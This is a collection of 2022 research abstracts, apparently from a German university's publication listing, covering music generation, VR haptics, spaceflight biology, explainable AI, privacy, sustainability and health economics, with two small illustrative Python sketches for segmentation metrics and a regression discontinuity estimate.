In the field of automatic music generation, one of the greatest challenges is the consistent generation of pieces continuously perceived positively by the majority of the audience, since there is no objective method to determine the quality of a musical composition. However, composing principles, which have been refined for millennia, have shaped the core characteristics of today's music. A hybrid music generation system, mlmusic, that incorporates various static, music-theory-based methods as well as data-driven subsystems is implemented to automatically generate pieces considered acceptable by the average listener. Initially, a MIDI dataset consisting of over 100 hand-picked pieces of various styles and complexities is analysed using basic music theory principles, and the abstracted information is fed into explicitly constrained LSTM networks. For chord progressions, each individual network is specifically trained on a given sequence length, while phrases are created by consecutively predicting the notes' offset, pitch and duration. Using these outputs as a composition's foundation, additional musical elements, along with constrained recurrent rhythmic and tonal patterns, are statically generated. Although no survey regarding the pieces' reception could be carried out, the successful generation of numerous compositions of varying complexities suggests that the integration of these fundamentally distinctive approaches might lead to success in other branches.
From Conclusion to Coda
(2022)
The visual and auditory quality of computer-mediated stimuli for virtual and extended reality (VR/XR) is rapidly improving. Still, it remains challenging to provide a fully embodied sensation and awareness of objects surrounding, approaching, or touching us in a 3D environment, though such feedback can greatly aid task performance in a 3D user interface. For example, feedback can provide warning signals for potential collisions (e.g., bumping into an obstacle while navigating) or pinpoint areas where one's attention should be directed (e.g., points of interest or danger). These events inform our motor behaviour and are often linked to perception mechanisms associated with our so-called peripersonal and extrapersonal space models that relate our body to object distance, direction, and contact point/impact. We discuss these reference spaces to explain the role of different cues in the motor action responses that underlie 3D interaction tasks. However, providing proximity and collision cues can be challenging. Various full-body vibration systems have been developed that stimulate body parts other than the hands, but they can have limitations in applicability and feasibility due to their cost and effort to operate, as well as hygienic considerations associated with, e.g., Covid-19. Informed by the results of a prior study using low frequencies for collision feedback, in this paper we look at an unobtrusive way to provide spatial, proximal and collision cues. Specifically, we assess the potential of foot sole stimulation to provide cues about object direction and relative distance, as well as collision direction and force of impact. Results indicate that in particular vibration-based stimuli could be useful within the frame of peripersonal and extrapersonal space perception to support 3DUI tasks. Current results favor the feedback combination of continuous vibrotactor cues for proximity and bass-shaker cues for body collision.
Results show that users could rather easily judge the different cues at a reasonably high granularity. This granularity may be sufficient to support common navigation tasks in a 3DUI.
In viticulture, infestation with harmful fungi leads to yield losses as well as to economic and ecological burdens caused by the preventive use of fungicides. These could be reduced by early detection of infestation. The vinoLAS® project aims to enable contactless early detection of downy mildew, an important harmful fungus in viticulture, using methods of laser-induced fluorescence spectroscopy. In this thesis, a detection module for analysing the laser-induced fluorescence light in four spectral channels is developed.
The requirements for the detection module are defined and its development is explained. The system can be divided into an optical and an electronic setup. The behaviour of the electronic setup is characterized by extensive measurements and compared with the requirements. It is then combined with the optical setup into a complete system, with which measurements are carried out in the vinoLAS® laboratory setup and compared with a reference measurement for verification.
The measurements on the electronic setup show that all requirements are met and in some cases exceeded. The resulting gated-integrator system is comparable to a considerably more expensive commercial gated integrator while offering twice as many channels and 44% lower noise. The discussion of the measurement data also presents approaches that allow further, cost-effective improvement of the electronic system.
The measurements with the complete system show qualitative agreement with the reference measurement, but quantitative deviations remain that require further investigation. It also becomes apparent that the quality of the measurement data is severely limited by a fluctuation of the laser frequency. However, an easily implementable and cost-effective solution to this problem is presented.
After implementing these two proposed improvements, the system can be integrated into the vinoLAS® setup and thus enable contactless early detection of downy mildew in grapevines.
Due to its expected positive impact on business, the application of artificial intelligence has increased widely. The decision-making procedures of these models are often complex and not easily understandable to a company's stakeholders, i.e. the people who have to follow up on recommendations or try to understand automated decisions of a system. This opaqueness and black-box nature might hinder adoption, as users struggle to make sense of and trust the predictions of AI models. Recent research on eXplainable Artificial Intelligence (XAI) has focused mainly on explaining models to AI experts with the purpose of debugging and improving model performance. In this article, we explore how such systems could be made explainable to the stakeholders. To this end, we propose a new convolutional neural network (CNN)-based explainable predictive model for product backorder prediction in inventory management. Backorders are orders that customers place for products that are currently not in stock. The company then takes the risk of producing or acquiring the backordered products while, in the meantime, customers can cancel their orders if fulfilment takes too long, leaving the company with unsold items in its inventory. Hence, for their strategic inventory management, companies need to make decisions based on assumptions. Our argument is that these tasks can be improved by offering explanations for AI recommendations. Our research therefore investigates how such explanations could be provided, employing Shapley additive explanations to explain the overall model's priorities in decision-making. In addition, we introduce locally interpretable surrogate models that can explain any individual prediction of a model. The experimental results demonstrate effectiveness in predicting backorders in terms of standard evaluation metrics and outperform known related works with an AUC of 0.9489.
Our approach demonstrates how current limitations of predictive technologies can be addressed in the business domain.
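One way to read "locally interpretable surrogate models" is a LIME-style local linear fit around a single prediction. A generic sketch under that assumption (synthetic data and all names are ours; the article's actual model, features, and method may differ):

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import Ridge

rng = np.random.default_rng(0)
X = rng.normal(size=(500, 5))
y = (X[:, 0] + 0.5 * X[:, 1] > 0).astype(int)   # synthetic "backorder" label
model = RandomForestClassifier(random_state=0).fit(X, y)  # black-box model

def local_surrogate(model, x, n=200, scale=0.3):
    # Perturb the instance, query the black-box model's probability for the
    # positive class, and fit a proximity-weighted linear surrogate whose
    # coefficients serve as local feature attributions.
    Z = x + rng.normal(scale=scale, size=(n, x.size))
    p = model.predict_proba(Z)[:, 1]
    w = np.exp(-np.sum((Z - x) ** 2, axis=1))    # closer samples weigh more
    return Ridge(alpha=1.0).fit(Z, p, sample_weight=w).coef_

attributions = local_surrogate(model, X[0])      # one value per feature
```

The surrogate is only valid near the explained instance; a stakeholder-facing tool would map the coefficients back to named features.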
When the Artemis missions launch, NASA's Orion spacecraft (and crew as of the Artemis II mission) will be exposed to the deep space radiation environment beyond the protection of Earth's magnetosphere. Hence, it is essential to characterize the effects of space radiation, microgravity, and the combination thereof on cells and organisms, i.e., to quantify any correlations between the deep space radiation environment, genetic variation, and induced genetic changes in cells. To address this, the Artemis I mission will include the Peristaltic Laboratory for Automated Science with Multigenerations (PLASM) hardware containing the Deep Space Radiation Genomics (DSRG) experiment. The scientific aims of DSRG are (i) to identify the metabolic and genomic pathways in yeast affected by microgravity, space radiation, and their combination, and (ii) to differentiate between gravity and radiation exposure on single-gene deletion/overexpressing strains' ability to thrive in the spaceflight environment. Yeast is used as a model system because 70% of its essential genes have a human homolog, and over half of these homologs can functionally replace their human counterpart. As part of the experiment preparation towards spaceflight, an Experiment Verification Test (EVT) was performed at the Kennedy Space Center to verify that the experiment design, hardware, and approach to automated operations will enable achieving the scientific aims. For the EVT, fluidic systems were assembled, sterilized, loaded, and acceptance-tested, and subsequently integrated with the engineering parts to produce a flight-like PLASM unit. Each fluidic system consisted of (i) a Media Bag, (ii) four Culture Bags loaded with Saccharomyces cerevisiae (two with deletion series and the remaining two with overexpression series), and (iii) tubing and check valves. 
The EVT PLASM unit was put under a temperature profile replicating the anticipated different phases of flight, including handover to launch, spaceflight, and splashdown to handover back to the science team, for a 58-day period. At EVT completion, the rate of activation, cellular growth, RNA integrity, and sample contamination were interrogated. All of the experiment's success criteria were satisfied, encouraging our efforts to perform this investigation on Artemis I. This manuscript thus describes the process of spaceflight experiment design maturation with a focus on the EVT, its results, DSRG's preparation for its planned launch on Artemis I in 2022, and how the PLASM hardware can enable other scientific goals on future Artemis missions and/or the Lunar Orbital Platform – Gateway.
Breaking new ground and setting new trends in research, teaching and transfer - this is what the Hochschule Bonn-Rhein-Sieg (H-BRS) managed to do last year despite the Corona pandemic. Talents, ideas and cooperations have come to fruition in various ways, always in close exchange between applied science, society and business. "expand" is therefore the motto of the annual report of the H-BRS for the year 2021, which has now been published.
The research examines Generation Z’s (Gen Z’s) attitudes, behavior and awareness regarding sustainability-oriented products in two European countries, located in the region of Western Balkans, Bosnia–Herzegovina and Serbia. The research deploys generational cohort theory (GCT) and a quantitative analysis of primary data collected through an online questionnaire among 1338 primary, high school and university students, all belonging to Generation Z. It deploys a Confirmatory Factor Analysis (CFA) by running both Maximum Likelihood (ML) and Markov Chain Monte Carlo (MCMC) procedures, the latter being suitable for binary variables, which have been deployed in the study. The results of MLCFA provide evidence that there is a statistically significant and relatively strong relation between sustainability and circular economy attitudes (SCEA) and sustainability and circular economy behavior (SCEB), while there is a statistically insignificant and relatively weak relation between sustainability and circular economy behavior (SCEB) and circular economy awareness (CEW). The results of the BCFA, which is based on MCMC procedure, are similar to the results based on a rather commonly used MLCFA procedure. The results also confirm that Gen Z knows more about the companies which recycle products than it does about the CE as a concept, while the vast majority is concerned about the future of the planet and is motivated to learn more about the CE through CE and various awareness-raising measures.
(1) Background: Autologous bone is supposed to contain vital cells that might improve the osseointegration of dental implants. The aim of this study was to investigate particulate and filtered bone chips collected during oral surgery intervention with respect to their osteogenic potential and the extent of microbial contamination to evaluate their usefulness for jawbone reconstruction prior to implant placement. (2) Methods: Cortical and cortical-cancellous bone chip samples of 84 patients were collected. The stem cell character of outgrowing cells was characterized by expression of CD73, CD90 and CD105, followed by osteogenic differentiation. The degree of bacterial contamination was determined by Gram staining, catalase and oxidase tests and further tests to identify the genera of the bacteria found. (3) Results: Pre-surgical antibiotic treatment of the patients significantly increased viability of the collected bone chip cells. No significant difference in plasticity was observed between cells isolated from the cortical and cortical-cancellous bone chip samples. Thus, both types of bone tissue can be used for jawbone reconstruction. The osteogenic differentiation was independent of the quantity and quality of the detected microorganisms, which comprise the most common bacteria in the oral cavity. (4) Discussion: This study shows that the quality of bone chip-derived stem cells is independent of the donor site and the extent of present common microorganisms, highlighting autologous bone tissue, assessable without additional surgical intervention for the patient, as a useful material for dental implantology.
Breaking new ground and setting new accents in research, teaching and transfer - this is what Hochschule Bonn-Rhein-Sieg (H-BRS) managed to do last year despite the Corona pandemic. Talents, ideas and cooperations have come to fruition in various ways, always in close exchange between applied science, society and business. "Entfalten" (expand) is therefore the motto of the annual report of the H-BRS for the year 2021, which has now been published.
The accurate forecasting of solar radiation plays an important role in predictive control applications for energy systems with a high share of photovoltaic (PV) energy. Especially off-grid microgrid applications using predictive control can benefit from forecasts with a high temporal resolution to address sudden fluctuations of PV power. However, cloud formation processes and movements are subject to ongoing research. For now-casting applications, all-sky imagers (ASI) are used to offer appropriate forecasts for the aforementioned applications. Recent research aims to achieve these forecasts via deep learning approaches, either as an image segmentation task to generate a DNI forecast through a cloud vectoring approach that translates the DNI to a GHI with ground-based measurements (Fabel et al., 2022; Nouri et al., 2021), or as an end-to-end regression task to generate a GHI forecast directly from the images (Paletta et al., 2021; Yang et al., 2021). While end-to-end regression might be the more attractive approach for off-grid scenarios, the literature reports increased performance compared to smart persistence but does not show satisfactory forecasting patterns (Paletta et al., 2021). This work takes a step back and investigates the possibility of translating ASI images to the current GHI in order to deploy the neural network as a feature extractor. An ImageNet-pretrained deep learning model is used to achieve this translation on an openly available dataset from the University of California San Diego (Pedro et al., 2019); the images and measurements were collected in Folsom, California. Results show that the neural network can successfully translate ASI images to GHI for a variety of cloud situations without the need for any external variables. Extending the neural network to a forecasting task also shows promising forecasting patterns, indicating that the network extracts both temporal and instantaneous features from the images to generate GHI forecasts.
The processing of employees’ personal data is dramatically increasing, yet there is a lack of tools that allow employees to manage their privacy. In order to develop these tools, one needs to understand what sensitive personal data are and what factors influence employees’ willingness to disclose. Current privacy research, however, lacks such insights, as it has focused on other contexts in recent decades. To fill this research gap, we conducted a cross-sectional survey with 553 employees from Germany. Our survey provides multiple insights into the relationships between perceived data sensitivity and willingness to disclose in the employment context. Among other things, we show that the perceived sensitivity of certain types of data differs substantially from existing studies in other contexts. Moreover, currently used legal and contextual distinctions between different types of data do not accurately reflect the subtleties of employees’ perceptions. Instead, using 62 different data elements, we identified four groups of personal data that better reflect the multi-dimensionality of perceptions. However, previously found common disclosure antecedents in the context of online privacy do not seem to affect them. We further identified three groups of employees that differ in their perceived data sensitivity and willingness to disclose, but neither in their privacy beliefs nor in their demographics. Our findings thus provide employers, policy makers, and researchers with a better understanding of employees’ privacy perceptions and serve as a basis for future targeted research on specific types of personal data and employees.
Emotions are associated with the genesis of visually induced motion sickness in virtual reality
(2022)
Visually induced motion sickness (VIMS) is a well-known side effect of virtual reality (VR) immersion, with symptoms including nausea, disorientation, and oculomotor discomfort. Previous studies have shown that pleasant music, odor, and taste can mitigate VIMS symptomatology, but the mechanism by which this occurs remains unclear. We predicted that positive emotions influence the VIMS-reducing effects. To investigate this, we conducted an experimental study with 68 subjects divided into two groups. The groups were exposed to either positive or neutral emotions before and during the VIMS-provoking stimulus. Otherwise, they performed exactly the same task of estimating the time-to-contact while confronted with a VIMS-provoking moving starfield stimulation. Emotions were induced by means of pre-tested videos and with International Affective Picture System (IAPS) images embedded in the starfield simulation. We monitored emotion induction before, during, and after the simulation, using the Self-Assessment Manikin (SAM) valence and arousal scales. VIMS was assessed before and after exposure using the Simulator Sickness Questionnaire (SSQ) and during simulation using the Fast Motion Sickness Scale (FMS) and FMS-D for dizziness symptoms. VIMS symptomatology did not differ between groups, but valence and arousal were correlated with perceived VIMS symptoms. For instance, reported positive valence prior to VR exposure was found to be related to milder VIMS symptoms and, conversely, experienced symptoms during simulation were negatively related to subjects’ valence. This study sheds light on the complex and potentially bidirectional relationship of VIMS and emotions and provides starting points for further research on the use of positive emotions to prevent VIMS.
Current research in augmented, virtual, and mixed reality (XR) reveals a lack of tool support for designing and, in particular, prototyping XR applications. While recent tools research is often motivated by studying the requirements of non-technical designers and end-user developers, the perspective of industry practitioners is less well understood. In an interview study with 17 practitioners from different industry sectors working on professional XR projects, we establish the design practices in industry, from early project stages to the final product. To better understand XR design challenges, we characterize the different methods and tools used for prototyping and describe the role and use of key prototypes in the different projects. We extract common elements of XR prototyping, elaborating on the tools and materials used for prototyping and establishing different views on the notion of fidelity. Finally, we highlight key issues for future XR tools research.
Einleitung
(2022)
A main factor hampering life in space is represented by high atomic number and energy (HZE) ions, which constitute about 1% of the galactic cosmic rays. In the frame of the “STARLIFE” project, we accessed the Heavy Ion Medical Accelerator (HIMAC) facility of the National Institute of Radiological Sciences (NIRS) in Chiba, Japan. By means of this facility, the extremophilic species Haloterrigena hispanica and Parageobacillus thermantarcticus were irradiated with high-LET ions (i.e., Fe, Ar, and He ions) at doses corresponding to a long permanence in the space environment. The survivability of HZE-treated cells depended on both the storage time and the hydration state during irradiation; indeed, dry samples were shown to be more resistant than hydrated ones. With particular regard to spores of the species P. thermantarcticus, they were the most resistant to irradiation in a water medium: an analysis of the changes in their biochemical fingerprinting during irradiation showed that, below the survivability threshold, the spores undergo a germination-like process, while at higher doses inactivation takes place as a consequence of the concomitant release of the core’s content and a loss of integrity of the main cellular components. Overall, the results reported here suggest that the selected extremophilic microorganisms could serve as biological models for space simulation and/or exposure to real space conditions, since they showed good resistance to ionizing radiation and were able to resume cellular growth after long-term storage.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied to objects and has a wide range of applications, from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore the local geometric structure around individual points, subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. To investigate further, this work uses a graph convolutional network (GCN) in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most previous works also focus only on segmenting complete point cloud data. Since such approaches are impractical in real-world scenarios, where complete point clouds are scarcely available, this work also proposes approaches for partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is proposed, based on the point completion network (PCN), which takes advantage of a graph-convolution-based hierarchical decoder for both completion and segmentation. In addition to predicting complete point clouds, results indicate that the network reaches within 5% of the mIoU performance of dedicated segmentation networks on partial point cloud segmentation.
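The mIoU figures quoted above average the intersection-over-union across part classes. A minimal sketch of how such a metric is typically computed (the labels and class count below are made up for illustration; this is not the evaluation code of the work itself):

```python
import numpy as np

def mean_iou(pred, target, num_classes):
    """Mean intersection-over-union across part classes.

    pred, target : integer arrays of per-point part labels.
    Classes absent from both prediction and ground truth are skipped.
    """
    ious = []
    for c in range(num_classes):
        inter = np.sum((pred == c) & (target == c))
        union = np.sum((pred == c) | (target == c))
        if union > 0:
            ious.append(inter / union)
    return float(np.mean(ious))

# Toy example: 6 points, 2 part classes; one point is mislabeled.
pred   = np.array([0, 0, 1, 1, 1, 0])
target = np.array([0, 0, 1, 1, 0, 0])
print(mean_iou(pred, target, num_classes=2))  # (3/4 + 2/3) / 2
```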
While the recent discussion on Art. 25 GDPR often considers the approach of data protection by design as an innovative idea, the notion of making data protection law more effective through requiring the data controller to implement the legal norms into the processing design is almost as old as the data protection debate. However, there is another, more recent shift in establishing the data protection by design approach through law, which is not yet understood to its fullest extent in the debate. Art. 25 GDPR requires the controller to not only implement the legal norms into the processing design but to do so in an effective manner. By explicitly declaring the effectiveness of the protection measures to be the legally required result, the legislator inevitably raises the question of which methods can be used to test and assure such efficacy. In our opinion, extending the legal compatibility assessment to the real effects of the required measures opens this approach to interdisciplinary methodologies. In this paper, we first summarise the current state of research on the methodology established in Art. 25 sect. 1 GDPR, and pinpoint some of the challenges of incorporating interdisciplinary research methodologies. On this premise, we present an empirical research methodology and first findings which offer one approach to answering the question of how to specify processing purposes effectively. Lastly, we discuss the implications of these findings for the legal interpretation of Art. 25 GDPR and related provisions, especially with respect to a more effective implementation of transparency and consent, and provide an outlook on possible next research steps.
Education for Sustainable Development (ESD, SDG 4) and human well-being (SDG 3) are among the central subjects of the Sustainable Development Goals (SDGs). In this article, based on the Questionnaire for Eudaimonic Well-Being (QEWB), we investigate to what extent (a) there is a connection between EWB and practical commitment to the SDGs and whether (b) there is a deficit in EWB among young people in general. We also want to use the article to draw attention to the need for further research on the links between human well-being and commitment to sustainable development. A total of 114 students between the ages of 18 and 34, who are either engaged in (extra)curricular activities for sustainable development (28 students) or not (86 students), completed the QEWB. The students were surveyed twice: once regarding their current EWB and once regarding their aspired EWB. Our results show that students who are actively engaged in activities for sustainable development report a higher EWB than non-active students. Furthermore, we show that students generally report deficits in EWB and wish for an improvement in their well-being. This especially applies to aspects of EWB related to self-discovery and the sense of meaning in life. Our study suggests that a practice-oriented ESD in particular can have a positive effect on the quality of life of young students and can support them in working on deficits in EWB.
E-Sport im Fernsehen - Eine Analyse der Chancen eines neuen Themenfelds bei deutschen Fernsehsendern
(2022)
In recent years, the media presence of e-sports in Germany has grown, with the result that the general public is now engaging with the topic as well. Television companies have thereby become aware of what was originally a niche sport, one that is at home on and deeply rooted in the internet, and are expanding their involvement in the field in order to share in the growing success forecast for e-sports. Yet a successful and suitable treatment of this trending topic appears less straightforward than for other traditional sports, owing to its particular conditions. This raises the question: What are the prospects of covering e-sports on German television channels when these particular circumstances are considered together? The TV broadcasters face the task of winning over an audience that is accustomed to consuming this topic on the internet, while television has in any case been losing ever more viewers to the internet since the start of the digital age. Besides the obstacles that must be overcome, however, e-sports also offers television companies added value; this thesis explores both.
This exploratory study offers a starting point for further research on e-sports in the German media, especially since existing work focuses mainly on live-streaming platforms or on the portrayal of e-sports in traditional media, without addressing the intentions and considerations of the television companies themselves. To close this gap, seven practitioners at German TV channels or broadcasting groups who have already covered e-sports with varying intensity, or at least considered doing so, were interviewed. The thesis concludes with eight hypotheses, derived by means of qualitative content analysis, that indicate which factors influence the prospects of such coverage; they also serve as starting points for follow-up research on the topic. The subject was examined under a variety of specific aspects and their interactions, such as the different types of broadcasters, the circumstances within the e-sports industry, and the existing corporate structures.
We analyze short-term effects of free hospitalization insurance for the poorest quintile of the population in the province of Khyber Pakhtunkhwa, Pakistan. First, we exploit that eligibility is based on an exogenous poverty score threshold and apply a regression discontinuity design. Second, we exploit imperfect rollout and compare insured and uninsured households using propensity score matching. With both methods we fail to detect significant effects on the incidence of hospitalization. Whereas the program did not meaningfully increase the quantity of health care consumed, insured households more often choose private hospitals, indicating a shift towards higher perceived quality of care.
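The regression discontinuity design described in this abstract compares outcomes just below and just above the eligibility cutoff. A minimal sketch on simulated data follows; the threshold, score range, and treatment effect are invented for illustration and are not taken from the study:

```python
import numpy as np

rng = np.random.default_rng(0)

# Simulated poverty scores around a hypothetical eligibility cutoff;
# households below the threshold receive the insurance.
threshold = 32.5
score = rng.uniform(threshold - 10, threshold + 10, size=2000)
treated = score < threshold

# Outcome with a smooth trend in the score plus a treatment jump of 0.15.
outcome = 0.02 * score + 0.15 * treated + rng.normal(0.0, 0.05, size=score.size)

def rdd_estimate(score, outcome, threshold, bandwidth):
    """Local linear RD estimate: fit a line on each side of the cutoff
    within the bandwidth and take the difference at the threshold."""
    left = (score >= threshold - bandwidth) & (score < threshold)
    right = (score >= threshold) & (score <= threshold + bandwidth)
    fit_left = np.polyfit(score[left], outcome[left], 1)
    fit_right = np.polyfit(score[right], outcome[right], 1)
    return np.polyval(fit_left, threshold) - np.polyval(fit_right, threshold)

# Should recover an effect close to the simulated jump of 0.15.
print(rdd_estimate(score, outcome, threshold, bandwidth=5.0))
```

The identifying assumption is that households just on either side of the cutoff are comparable, so the jump in the fitted lines at the threshold estimates the causal effect of eligibility.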